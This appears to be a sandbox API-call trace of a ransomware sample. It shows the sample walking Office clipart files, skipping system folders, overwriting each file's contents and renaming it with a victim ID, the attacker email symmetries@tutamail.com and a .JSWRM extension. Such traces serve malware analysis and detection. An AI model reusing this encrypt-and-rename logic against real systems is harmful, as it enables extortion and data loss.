ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x83c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00435_.WMF", cAlternateFileName="")) returned 1 [0077.527] lstrcmpiW (lpString1="FD00435_.WMF", lpString2=".") returned 1 [0077.527] lstrcmpiW (lpString1="FD00435_.WMF", lpString2="..") returned 1 [0077.527] lstrcmpiW (lpString1="FD00435_.WMF", lpString2="...") returned 1 [0077.527] lstrcmpiW (lpString1="FD00435_.WMF", lpString2="windows") returned -1 [0077.527] lstrcmpiW (lpString1="FD00435_.WMF", lpString2="recovery") returned -1 [0077.527] lstrcmpiW (lpString1="FD00435_.WMF", lpString2="perflogs") returned -1 [0077.528] lstrcmpiW (lpString1="FD00435_.WMF", lpString2="documents and settings") returned 1 [0077.528] lstrcmpiW (lpString1="FD00435_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.528] lstrcmpiW (lpString1="FD00435_.WMF", lpString2="system volume information") returned -1 [0077.528] lstrcmpiW (lpString1="FD00435_.WMF", lpString2="msocache") returned -1 [0077.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0077.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00435_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00435_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00435_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0077.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0077.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00435_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00435_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00435_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0077.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0077.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0077.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0077.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00435_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.528] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2108) returned 1 [0077.528] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x830) returned 0x20c6c0 [0077.528] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x830, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x830, lpOverlapped=0x0) returned 1 [0077.530] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.530] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x830, lpOverlapped=0x0) returned 1 [0077.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0077.530] CloseHandle (hObject=0x314) returned 1 [0077.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0077.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0077.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0077.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0077.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0077.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0077.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0077.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0077.530] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00435_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00435_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0077.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0077.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0077.531] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13ea, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00438_.WMF", cAlternateFileName="")) returned 1 [0077.531] lstrcmpiW (lpString1="FD00438_.WMF", lpString2=".") returned 1 [0077.532] lstrcmpiW (lpString1="FD00438_.WMF", lpString2="..") returned 1 [0077.532] lstrcmpiW (lpString1="FD00438_.WMF", lpString2="...") returned 1 [0077.532] lstrcmpiW (lpString1="FD00438_.WMF", lpString2="windows") returned -1 [0077.532] lstrcmpiW (lpString1="FD00438_.WMF", lpString2="recovery") returned -1 [0077.532] lstrcmpiW (lpString1="FD00438_.WMF", lpString2="perflogs") returned -1 [0077.532] lstrcmpiW (lpString1="FD00438_.WMF", lpString2="documents and settings") returned 1 [0077.532] lstrcmpiW (lpString1="FD00438_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.532] lstrcmpiW (lpString1="FD00438_.WMF", lpString2="system volume information") returned -1 [0077.532] lstrcmpiW (lpString1="FD00438_.WMF", lpString2="msocache") returned -1 [0077.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0077.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00438_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00438_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00438_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0077.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0077.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00438_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00438_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00438_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0077.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0077.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0077.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0077.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.532] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5098) returned 1 [0077.532] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13e0) returned 0x205850 [0077.533] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x13e0, lpOverlapped=0x0) returned 1 [0077.534] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.534] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x13e0, lpOverlapped=0x0) returned 1 [0077.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0077.534] CloseHandle (hObject=0x314) returned 1 [0077.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0077.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0077.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0077.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0077.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0077.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0077.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0077.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0077.535] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00438_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00438_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0077.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0077.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0077.535] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22de, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00455_.WMF", cAlternateFileName="")) returned 1 [0077.536] lstrcmpiW (lpString1="FD00455_.WMF", lpString2=".") returned 1 [0077.536] lstrcmpiW (lpString1="FD00455_.WMF", lpString2="..") returned 1 [0077.536] lstrcmpiW (lpString1="FD00455_.WMF", lpString2="...") returned 1 [0077.536] lstrcmpiW (lpString1="FD00455_.WMF", lpString2="windows") returned -1 [0077.536] lstrcmpiW (lpString1="FD00455_.WMF", lpString2="recovery") returned -1 [0077.536] lstrcmpiW (lpString1="FD00455_.WMF", lpString2="perflogs") returned -1 [0077.536] lstrcmpiW (lpString1="FD00455_.WMF", lpString2="documents and settings") returned 1 [0077.536] lstrcmpiW (lpString1="FD00455_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.536] lstrcmpiW (lpString1="FD00455_.WMF", lpString2="system volume information") returned -1 [0077.536] lstrcmpiW (lpString1="FD00455_.WMF", lpString2="msocache") returned -1 [0077.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0077.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00455_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00455_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00455_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0077.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0077.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00455_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00455_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00455_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0077.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0077.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0077.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0077.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00455_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.537] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8926) returned 1 [0077.537] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x22d0) returned 0x24d210 [0077.537] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x22d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x22d0, lpOverlapped=0x0) returned 1 [0077.539] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.539] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x22d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x22d0, lpOverlapped=0x0) returned 1 [0077.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.539] CloseHandle (hObject=0x314) returned 1 [0077.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0077.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0077.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0077.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0077.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0077.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0077.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0077.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0077.540] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00455_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00455_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0077.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0077.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0077.543] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x43fe, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00459_.WMF", cAlternateFileName="")) returned 1 [0077.543] lstrcmpiW (lpString1="FD00459_.WMF", lpString2=".") returned 1 [0077.543] lstrcmpiW (lpString1="FD00459_.WMF", lpString2="..") returned 1 [0077.543] lstrcmpiW (lpString1="FD00459_.WMF", lpString2="...") returned 1 [0077.543] lstrcmpiW (lpString1="FD00459_.WMF", lpString2="windows") returned -1 [0077.543] lstrcmpiW (lpString1="FD00459_.WMF", lpString2="recovery") returned -1 [0077.544] lstrcmpiW (lpString1="FD00459_.WMF", lpString2="perflogs") returned -1 [0077.544] lstrcmpiW (lpString1="FD00459_.WMF", lpString2="documents and settings") returned 1 [0077.544] lstrcmpiW (lpString1="FD00459_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.544] lstrcmpiW (lpString1="FD00459_.WMF", lpString2="system volume information") returned -1 [0077.544] lstrcmpiW (lpString1="FD00459_.WMF", lpString2="msocache") returned -1 [0077.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0077.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00459_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00459_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00459_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0077.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0077.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00459_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 